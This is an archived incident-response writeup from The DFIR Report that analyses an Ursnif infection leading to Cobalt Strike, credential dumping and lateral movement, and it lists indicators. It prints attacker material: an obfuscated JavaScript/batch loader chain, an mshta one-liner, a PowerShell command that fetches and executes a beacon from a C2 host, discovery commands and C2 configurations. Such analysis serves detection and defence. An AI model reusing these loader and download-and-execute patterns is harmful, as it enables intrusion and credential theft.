{
	"id": "80f461c7-0fc3-4a1e-8b20-b407dfca8741",
	"created_at": "2026-04-06T00:17:57.290802Z",
	"updated_at": "2026-04-10T03:24:23.556499Z",
	"deleted_at": null,
	"sha1_hash": "c17e16bba1b71d5a3aa5cb6fc11535cf624ab052",
	"title": "Unwrapping Ursnifs Gifts - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1911299,
	"plain_text": "Unwrapping Ursnifs Gifts - The DFIR Report\r\nBy editor\r\nPublished: 2023-01-09 · Archived: 2026-04-05 13:06:04 UTC\r\nIn late August 2022, we investigated an incident involving Ursnif malware, which resulted in Cobalt Strike being\r\ndeployed. This was followed by the threat actors moving laterally throughout the environment using an admin\r\naccount.\r\nThe Ursnif malware family (also commonly referred to as Gozi or ISFB) is one of the oldest banking trojans still\r\nactive today. It has an extensive past of code forks and evolutions that has lead to several active variants in the last\r\n5 years including Dreambot, IAP, RM2, RM3 and most recently, LDR4.\r\nFor this report, we have referred to the malware as Ursnif for simplicity, however we also recommend reading\r\nMandiant’s article on LDR4.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private reports annually, such as this one but more concise and quickly\r\npublished post-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit,\r\nSliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term\r\ntracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nIn this intrusion, a malicious ISO file was delivered to a user which contained Ursnif malware. The malware\r\ndisplayed an interesting execution flow, which included using a renamed copy of rundll32. Once executed, the\r\nmalware conducted automatic discovery on the beachhead host, as we have observed with other loaders such as\r\nIcedID. The malware also established persistence on the host with the creation of a registry run key.\r\nApproximately 4 days after the initial infection, new activity on the host provided a clear distinction of a threat\r\nactor performing manual actions (hands on keyboard). The threat actor used a Background Intelligent Transfer\r\nService (BITS) job to download a Cobalt Strike beacon, and then used the beacon for subsequent actions.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 1 of 32\n\nThe threat actor first ran some initial discovery on the host using built-in Windows utilities like ipconfig,\r\nsysteminfo, net, and ping. Shortly afterwards, the threat actor injected into various processes and then proceeded\r\nto access lsass memory on the host to extract credentials.\r\nUsing the credentials extracted from memory, the threat actors began to move laterally. They targeted a domain\r\ncontroller and used Impacket’s wmiexec.py to execute code on the remote host. This included executing both a\r\nmsi installer for the RMM tools Atera and Splashtop, as well as a Cobalt Strike executable beacon. These files\r\nwere transferred to the domain controller over SMB.\r\nAfter connecting to the Cobalt Strike beacon on the domain controller, the threat actor executed another round of\r\ndiscovery tasks and dumped lsass memory on the domain controller. Finally, they dropped a script named\r\nadcomp.bat which executed a PowerShell command to collect data on computers in the Windows domain.\r\nThe following day, there was a short check-in on the beachhead host from a Cobalt Strike beacon, no other\r\nactivity occurred until near the end of the day. At that time, the threat actor became active by initiating a proxied\r\nRDP connection via the Cobalt Strike beacon to the domain controller. From there, the threat actor began\r\nconnecting to various hosts across the network.\r\nOne host of interest was one of the backup servers, which was logged into, the state of backups were checked and\r\nrunning processes were reviewed before exiting the session. The threat actor was later evicted from the network.\r\nTimeline\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 2 of 32\n\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 3 of 32\n\nAnalysis and reporting completed by @_pete_0, @svch0st and UC1.\r\nInitial Access\r\nIn this case, the Ursnif malware was delivered using a very familiar technique of being contained within an ISO\r\nfile.\r\nThe DFIR Report has previously reported on several incidents that involved the tactic of delivering malicious flies\r\nusing ISO files:\r\nQuantum Ransomware\r\nBumbleBee Roasts Its Way to Domain Admin\r\nBumbleBee: Round Two\r\nDiavol Ransomware\r\nAs we have previously highlighted, the Event Log Microsoft-Windows-VHDMP-Operational.evtx contains high\r\nconfidence evidence when users mount ISO files. We recommend looking for these events (especially Event ID’s\r\n1, 12 \u0026 25) in your environment and checking for anomalies.\r\nIn this case, the user had saved the file 3488164.iso to the their downloads folder and mounted it.\r\nOnce mounted, the new drive contained a LNK file 6570872.lnk and hidden folder “me”.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 4 of 32\n\nIf we parse this LNK file with LECmd (by Eric Zimmerman), it highlights the execution path and the icon it\r\nappears as:\r\nThe contents of hidden folder “me”, included several files and folders that were used for the execution of Ursnif.\r\nOf interest, the folder included a legitimate copy of rundll32.exe (renamed to 123.com ).\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 5 of 32\n\nSummary of the files found in 3488164.iso (a detailed break down of these can be found in Execution):\r\nFile Name Purpose\r\n6570872.lnk LNK file that executes alsoOne.bat\r\nme/by Empty folder\r\nme/here Empty folder\r\nme/123.com Renamed legitimate version of rundll32.exe\r\nme/alsoOne.bat Batch script to run canWell.js with specific arguments\r\nme/canWell.js Reverses argument strings and executes tslt.db with 123.com\r\nme/itslt.db Ursnif DLL\r\nor.jpg Image not used.\r\nExecution\r\nOnce the user had mounted the ISO and the LNK file was executed by the user, the complex execution flow\r\nstarted.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 6 of 32\n\nUrsnif Malware\r\nHighlighted in Initial Access, the LNK file would execute a batch script alsoOne.bat . This script called a\r\nJavaScript file canWell.js in the same directory and provided a number of strings as arguments.\r\nalsoOne.bat\r\nset %params%=hello\r\nme\\canWell.js hello cexe lldnur revreSretsigeRllD\r\ncanWell.js\r\n/**\r\nWhnldGh\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 7 of 32\n\n*/\r\nfunction reverseString(str)\r\n{\r\nvar splitString = str.split(\"\");\r\nvar reverseArray = splitString.reverse();\r\nvar joinArray = reverseArray.join(\"\");\r\nreturn joinArray;\r\n}\r\nfunction ar(id)\r\n{\r\nr = WScript.Arguments(id);\r\nreturn r;\r\n}\r\nvar sh = WScript.CreateObject(\"WScript.Shell\");\r\nsh[reverseString(ar(1))](\"me\\\\123.com me/itsIt.db,\"+reverseString(a\r\nThe JS file was then executed with wscript.exe and used the provided command line arguments, which created\r\nand executed the following command using WScript.Shell.Exec():\r\nme/123.com me/itsIt.db,DllRegisterServer\r\nUsing the SRUM database, we were able to determine that the custom rundll32.exe binary downloaded\r\napproximately 0.4 MB of data.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 8 of 32\n\nOnce the malware was executed, the parent instance of explorer launched MSHTA with the following command:\r\n\"C:\\Windows\\System32\\mshta.exe\" \"about:\u003chta:application\u003e\u003cscript\u003eCxak='wscript.shell';resizeTo(0,2);ev\r\nThis oneliner created a new ActiveX object to eval() the content stored in the registry key in the users registry\r\nhive. The content of the value “ActiveDevice”:\r\nThe payload used another ActiveX object to run a PowerShell command. This command created additional aliases\r\nof common default PowerShell aliases gp (Get-ItemProperty) and iex (Invoke-Expression). These two new\r\naliases were used to get and execute the content in another registry value “MemoryJunk”:\r\nAhgvof=new ActiveXObject('WScript.Shell');Ahgvof.Run('powershell new-alias -name qirlbtfhgo -value gp\r\nAnalyst Note: The names of the registry values changed when we ran the payload in a sandbox during analysis,\r\nand hence suspected to be generated at random at execution.\r\nThe last registry key was used to store additional PowerShell code. This script called a combination of\r\nQueueUserAPC, GetCurrentThreadId, OpenThread, and VirtualAlloc to perform process injection of shellcode\r\nstored in Base64.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 9 of 32\n\nWhen Add-Type cmdlet is executed, the C# compiler csc.exe is invoked by PowerShell to compile this class\r\ndefinition, which results in the creation of temporary files in %APPDATA%\\Local\\Temp.\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @\"C:\\Users\\\u003cREDACTED\u003e\\Ap\r\nFinally, a unique command spawned from the parent explorer.exe process that was called pause.exe with multiple\r\narguments, which appeared to not provide any additional functionality.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 10 of 32\n\n\"C:\\Windows\\syswow64\\cmd.exe\" /C pause dll mail, ,\r\nA sigma rule for this cmdline can be found in the Detections section of this report.\r\nAt this point in time, less than a minute of time has elapsed since the user first opened the malware.\r\nOnce the malware was established on the host, there was limited malicious activity, until around 3 days later. That\r\nis when we began to observe evidence indicative of “hands-on-keyboard” activity.\r\nCobalt Strike\r\nAn instance of cmd.exe was launched through explorer.exe which ran the following command:\r\npowershell.exe -nop -c \"start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\\' + [Sy\r\nAnalyst Note: Ursnif has been known to have VNC-like capabilities. It is possible this explorer.exe ➝ cmd.exe\r\nsession was through a VNC session.\r\nThis PowerShell command started a BITS job to download a Cobalt Strike beacon from 193.201.9[.]199 and\r\nsaved it with a random name to %TEMP%. It then read the file into a variable, and deleted it before executing\r\ncontent with IEX .\r\nThe event log Microsoft-Windows-Bits-Client%254Operational.evtx corroborated this activity:\r\nThe activity following this event demonstrated a clear distinction of the threat actor performing discovery\r\nmanually.\r\nPersistence\r\nOnce the foothold had been achieved, after execution of Ursnif on the beachhead host, persistence was achieved\r\nby creating a ‘Run’ key named ManagerText which was configured to execute a LNK file which executed a\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 11 of 32\n\nPowerShell script.\r\nCredential Access\r\nWe observed a process created by Cobalt Strike accessing lsass.exe. The GrantedAccess code of 0x1010 is a\r\nknown indicator of such tools as Mimikatz. This was observed on both the beachhead host and a domain\r\ncontroller.\r\nLogName=Microsoft-Windows-Sysmon/Operational\r\nEventCode=10\r\nEventType=4\r\nComputerName=\u003cREDACTED\u003e\r\nUser=SYSTEM\r\nSid=S-1-5-18\r\nSidType=1\r\nSourceName=Microsoft-Windows-Sysmon\r\nType=Information\r\nRecordNumber=765707\r\nKeywords=None\r\nTaskCategory=Process accessed (rule: ProcessAccess)\r\nOpCode=Info\r\nMessage=Process accessed:\r\nRuleName: technique_id=T1003,technique_name=Credential Dumping\r\nUtcTime: \u003cREDACTED\u003e\r\nSourceProcessGUID: {aaadb608-97b2-630c-6750-000000000400}\r\nSourceProcessId: 4768\r\nSourceThreadId: 4248\r\nSourceImage: C:\\Windows\\system32\\rundll32.exe\r\nTargetProcessGUID: {aaadb608-45a2-62fc-0c00-000000000400}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1010\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+20d0e|UNKNOWN(00000\r\nDiscovery\r\nUrsnif related discovery\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 12 of 32\n\nAs we have observed in other malware, Ursnif ran a number of automated discovery commands to gain\r\ninformation about the environment. The following commands were executed and their standard output was\r\nredirected to append to a file in the user’s %APPDATA%\\Local\\Temp\\\r\ncmd /C \"wmic computersystem get domain |more \u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"systeminfo.exe \u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net view \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"nslookup 127.0.0.1 \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"tasklist.exe /SVC \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"driverquery.exe \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s \u003e\u003e C:\\Users\\\u003cREDA\r\ncmd /C \"nltest /domain_trusts \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net config workstation \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"nltest /domain_trusts \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"nltest /domain_trusts /all_trusts \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net view /all /domain \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net view /all \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\nManual discovery\r\nOnce the threat actor had Cobalt Strike running on the beachhead host, they ran the following commands:\r\nwhoami\r\nwhoami /groups\r\ntime\r\nipconfig /all\r\nsysteminfo\r\nThe threat actor quickly took interest in a support account. This account belonged to the Domain Admin group.\r\nnet user \u003cREDACTED\u003e\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 13 of 32\n\nThe threat actor also used a batch script to collect a list of all computer objects on the domain using\r\nC:\\Windows\\system32\\cmd.exe /C adcomp.bat which contained the PowerShell command:\r\npowershell Get-ADComputer -Filter * -Properties Name,Operatingsystem, OperatingSystemVersion, Operati\r\nDuring the final actions taken by the threat actors before eviction, after completing RDP connections to various\r\nhosts on the network, the threat actors checked running processes on the accessed hosts via taskmanager, which\r\nwere started via their interactive RDP session as noted by the /4 command line argument.\r\nC:\\Windows\\system32\\taskmgr.exe /4\r\nLateral Movement\r\nWMI was used to pivot to a domain controller on the network. The actor leveraged Impacket’s wmiexec.py to\r\nexecute commands with a semi-interactive shell, most likely using credentials gathered by the previous LSASS\r\naccess.\r\nThe commands executed included directory traversal, host discovery, and execution of tools on the DC.\r\nA breakdown of the parent and child processes invoked:\r\nThe command can be broken down as follows:\r\n‘Q’ indicates turn off echo – no response.\r\n‘C’ indicates to stop after command execution.\r\nThe 127.0.01 and ADMIN$ indicates C:\\Windows.\r\nOutput is achieved via the parameter ‘2\u003e\u00261’, to redirect errors and output to one file:\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 14 of 32\n\nThis command line closely resembles the code within the wmiexec.py as part of the Impacket tool maintained by\r\nFortra.\r\nAs Impacket interacts with remote endpoints via WMI over TCP via DCERPC, its possible to inspect network\r\nlevel packets:\r\nThe use of Impacket by threat actors has been recently detailed by CISA in alert AA22-277A – Impacket and\r\nExfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization.\r\nThe Impacket process hierarchy in this case can be visualized as:\r\nAt the network level, commands are issued by DCOM/RPC port 135, with responses by SMB using port 445. We\r\ncan observe a number of WMI requests via DCERPC from one endpoint to a target endpoint based on the ports.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 15 of 32\n\nCorrelating the network activity to the host activity confirms that the ‘Powershell.exe’ process initiated the WMI\r\nrequests.\r\nThe destination port is within the ephemeral port range 49152–65535, which is for short-lived, time based,\r\ncommunications RFC 6335.\r\n13Cubed (Richard Davis) also released an amazing resource to investigate Impacket related incidents here:\r\nhttps://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet_poster.pdf\r\nOne of the observed commands invoked via WMI was ‘firefox.exe’.\r\nThis was dropped on the DC and spawned a number of processes and invoked a number of hands-on commands.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 16 of 32\n\nThe process generated a significant volume of network connections to 193.201.9[.]199, averaging ~6K requests\r\nper hour, equating to \u003e150K connections throughout the duration of the intrusion.\r\nRDP was also used by the threat actor on the final two days of the intrusion to connect to various hosts from a\r\ndomain controller proxying the traffic via the firefox.exe Cobalt Strike beacon.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 17 of 32\n\nCommand and Control\r\nUrsnif\r\nUrsnif was seen using the following domains and IPs:\r\n5.42.199.83\r\nsuperliner.top\r\n62.173.149.7\r\ninternetlines.in\r\n31.41.44.97\r\nsuperstarts.top\r\n31.41.44.27\r\nsuperlinez.top\r\n31.41.44.27\r\ninternetlined.com\r\n208.91.197.91\r\ndenterdrigx.com:\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 18 of 32\n\n187.190.48.135\r\n210.92.250.133\r\n189.143.170.233\r\n201.103.222.246\r\n151.251.24.5\r\n190.147.189.122\r\n115.88.24.202\r\n211.40.39.251\r\n187.195.146.2\r\n186.182.55.44\r\n222.232.238.243\r\n211.119.84.111\r\n51.211.212.188\r\n203.91.116.53\r\n115.88.24.203\r\n190.117.75.91\r\n181.197.121.228\r\n190.167.61.79\r\n109.102.255.230\r\n211.119.84.112\r\n190.107.133.19\r\n185.95.186.58\r\n175.120.254.9\r\n46.194.108.30\r\n190.225.159.63\r\n190.140.74.43\r\n187.156.56.52\r\n195.158.3.162\r\n138.36.3.134\r\n109.98.58.98\r\n24.232.210.245\r\n222.236.49.123\r\n175.126.109.15\r\n124.109.61.160\r\n95.107.163.44\r\n93.152.141.65\r\n5.204.145.65\r\n116.121.62.237\r\n31.166.129.162\r\n222.236.49.124\r\n211.171.233.129\r\n211.171.233.126\r\n211.53.230.67\r\n196.200.111.5\r\n190.219.54.242\r\n190.167.100.154\r\n110.14.121.125\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 19 of 32\n\n58.235.189.192\r\n37.34.248.24\r\n110.14.121.123\r\n179.53.93.16\r\n175.119.10.231\r\n211.59.14.90\r\n188.48.64.249\r\n187.232.150.225\r\n186.7.85.71\r\n148.255.20.4\r\n91.139.196.113\r\n41.41.255.235\r\n31.167.236.174\r\n189.165.2.131\r\n1.248.122.240\r\nWe also observed several modules for Ursnif downloaded from the following IP:\r\n193.106.191.186\r\n 3db94cf953886aeb630f1ae616a2ec25 cook32.rar\r\n d99cc31f3415a1337e57b8289ac5011e cook64.rar\r\n a1f634f177f73f112b5356b8ee04ad19 stilak32.rar\r\n 8ea6ad3b1acb9e7b2e64d08411af3c9a stilak64.rar\r\n 0c5862717f00f28473c39b9cba2953f4 vnc32.rar\r\n ce77f575cc4406b76c68475cb3693e14 vnc64.rar\r\nJoeSandbox reported this sample having the following configuration:\r\n{\r\n \"RSA Public Key\": \"WzgHg0uTPZvhLtnG19qpIk+GmHzcoxkfTefSu6gst5n3mxnOBivzR4MH4a6Ax7hZ5fgcuPGt3NKKPbYT\r\n \"c2_domain\": [\r\n \"superliner.top\",\r\n \"superlinez.top\",\r\n \"internetlined.com\",\r\n \"internetlines.in\",\r\n \"medialists.su\",\r\n \"medialists.ru\",\r\n \"mediawagi.info\",\r\n \"mediawagi.ru\",\r\n \"5.42.199.83\",\r\n \"denterdrigx.com\",\r\n \"и\",\r\n \"digserchx.at\"\r\n ],\r\n \"ip_check_url\": [\r\n \"http://ipinfo.io/ip\",\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 20 of 32\n\n\"http://curlmyip.net\"\r\n ],\r\n \"serpent_key\": \"Jv1GYc8A8hCBIeVD\",\r\n \"tor32_dll\": \"file://c:\\\\test\\\\test32.dll\",\r\n \"tor64_dll\": \"file://c:\\\\test\\\\tor64.dll\",\r\n \"server\": \"50\",\r\n \"sleep_time\": \"1\",\r\n \"SetWaitableTimer_value(CRC_CONFIGTIMEOUT)\": \"60\",\r\n \"time_value\": \"60\",\r\n \"SetWaitableTimer_value(CRC_TASKTIMEOUT)\": \"60\",\r\n \"SetWaitableTimer_value(CRC_SENDTIMEOUT)\": \"300\",\r\n \"SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)\": \"60\",\r\n \"not_use(CRC_BCTIMEOUT)\": \"10\",\r\n \"botnet\": \"3000\",\r\n \"SetWaitableTimer_value\": \"1\"\r\n}\r\nPivoting on domains registered in WHOIS with the email snychkova73@bk.ru or organization Rus Lak , reveals\r\nmany similar domains as seen in this intrusion.\r\nCobalt Strike\r\nThe following Cobalt Strike C2 server was observed:\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 21 of 32\n\n193.201.9.199:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: f176ba63b4d68e576b5ba345bec2c7b7\r\nCertificate: [6e:ce:5e:ce:41:92:68:3d:2d:84:e2:5b:0b:a7:e0:4f:9c:b7:eb:7c]\r\nNot Before: 2015/05/20 18:26:24 UTC\r\nNot After: 2025/05/17 18:26:24 UTC\r\nIssuer Org:\r\nSubject Common:\r\nSubject Org:\r\nPublic Algorithm: rsaEncryption\r\nThe following Cobalt Strike configuration was observed:\r\n{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n \"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"false\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"IiuPJ9vfuo3dVZ7son6mSA==\",\r\n \"transform_x64\": [],\r\n \"transform_x86\": [],\r\n \"startrwx\": \"true\",\r\n \"min_alloc\": \"0\",\r\n \"userwx\": \"true\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 22 of 32\n\n\"RtlCreateUserThread\"\r\n ],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1048576\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnCZHWnYFqYB/6gJdkc4MPDTtBJ20nkEAd3tsY4tPKs8M\r\n \"port\": \"443\",\r\n \"hostname\": \"193.201.9.199\"\r\n },\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"kill_date\": null,\r\n \"license_id\": \"1580103824\",\r\n \"jitter\": \"0\",\r\n \"sleeptime\": \"60000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\r\n \"print\"\r\n ]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/__utm.gif\"\r\n },\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 23 of 32\n\n\"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/submit.php\"\r\n }\r\n}\r\nChecking the certificate used, reveals that it is a default SSL certificate for Cobalt Strike,\r\n83cd09b0f73c909bfc14883163a649e1d207df22 .\r\nAtera \u0026 SplashTop\r\nEven though the threat actor installed these agents, we did not observe any activity with these tools.\r\nExfiltration\r\nSeveral HTTP Post events were observed to the identified domains denterdrigx[.]com, superliner[.]top and\r\n5.42.199[.]83, masquerading as image uploads.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 24 of 32\n\nThe user agent ‘Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)’, an unusual browser\r\nconfiguration to masquerade as, which indicates use of Internet Explorer 8.0 (that was released ~2009).\r\nThe POST event included a MIME part indicating file upload activity\r\nThe example HTTP stream containing the content\r\nThe file that was uploaded 775E.bin was deleted by the injected ‘Explorer.exe’ process from the target endpoint in\r\nfolder ‘\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp’\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 25 of 32\n\nThe exfiltration activity along with the beacon activity can be detected using the following network signatures: ET\r\nMALWARE Ursnif Variant CnC Data Exfil and ET MALWARE Ursnif Variant CnC Beacon. In this example, the\r\nmix of activity can be observed as:\r\nImpact\r\nThe threat actor was able to RDP to a backup server using the admin credentials they acquired. Using the logs in\r\nMicrosoft-Windows-TerminalServices-LocalSessionManager/Operational we were able to determine the threat\r\nactor spent approximately 10 minutes on the backup server before disconnecting their RDP session. By doing this,\r\nthey revealed the workstation name of the client: WIN-RRRU9REOK18 .\r\nLogName=Security\r\nEventCode=4624\r\nEventType=0\r\nComputerName=\u003cREDACTED\u003e\r\nSourceName=Microsoft Windows security auditing.\r\nType=Information\r\nRecordNumber=300297\r\nKeywords=Audit Success\r\nTaskCategory=Logon\r\nOpCode=Info\r\nMessage=An account was successfully logged on.\r\nLogon Information:\r\nLogon Type: 3\r\nRestricted Admin Mode: -\r\nVirtual Account: No\r\nElevated Token: Yes\r\nNetwork Information:\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 26 of 32\n\nWorkstation Name: WIN-RRRU9REOK18\r\nSource Network Address: \u003cREDACTED\u003e\r\nSource Port: 0\r\nDetailed Authentication Information:\r\nLogon Process: NtLmSsp\r\nAuthentication Package: NTLM\r\nTransited Services: -\r\nPackage Name (NTLM only): NTLM V2\r\nDuring that time, the threat actor undertook a number of hands-on keyboard actions; this included reviewing\r\nbackups in a backup console, checking on running tasks, and using notepad to paste in the following content.\r\nProcess execution:\r\nC:\\Program Files\\[redacted]\\Console\\[redacted].exe\r\n\"C:\\Windows\\system32\\taskmgr.exe\" /4\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\USER\\Desktop\\New Text Document.txt\r\nSysmon Copy Paste Collection EID 24:\r\nuser: DOMAIN\\USER ip: 127.0.0.1 hostname: WIN-RRRU9REOK18\r\nIndicators\r\nAtomic\r\nRDP Client Name:\r\nWIN-RRRU9REOK18\r\nUrsnif Domains:\r\ndenterdrigx.com\r\nsuperliner.top\r\ninternetlines.in\r\nsuperstarts.top\r\nsuperlinez.top\r\ninternetlined.com\r\nUrsnif 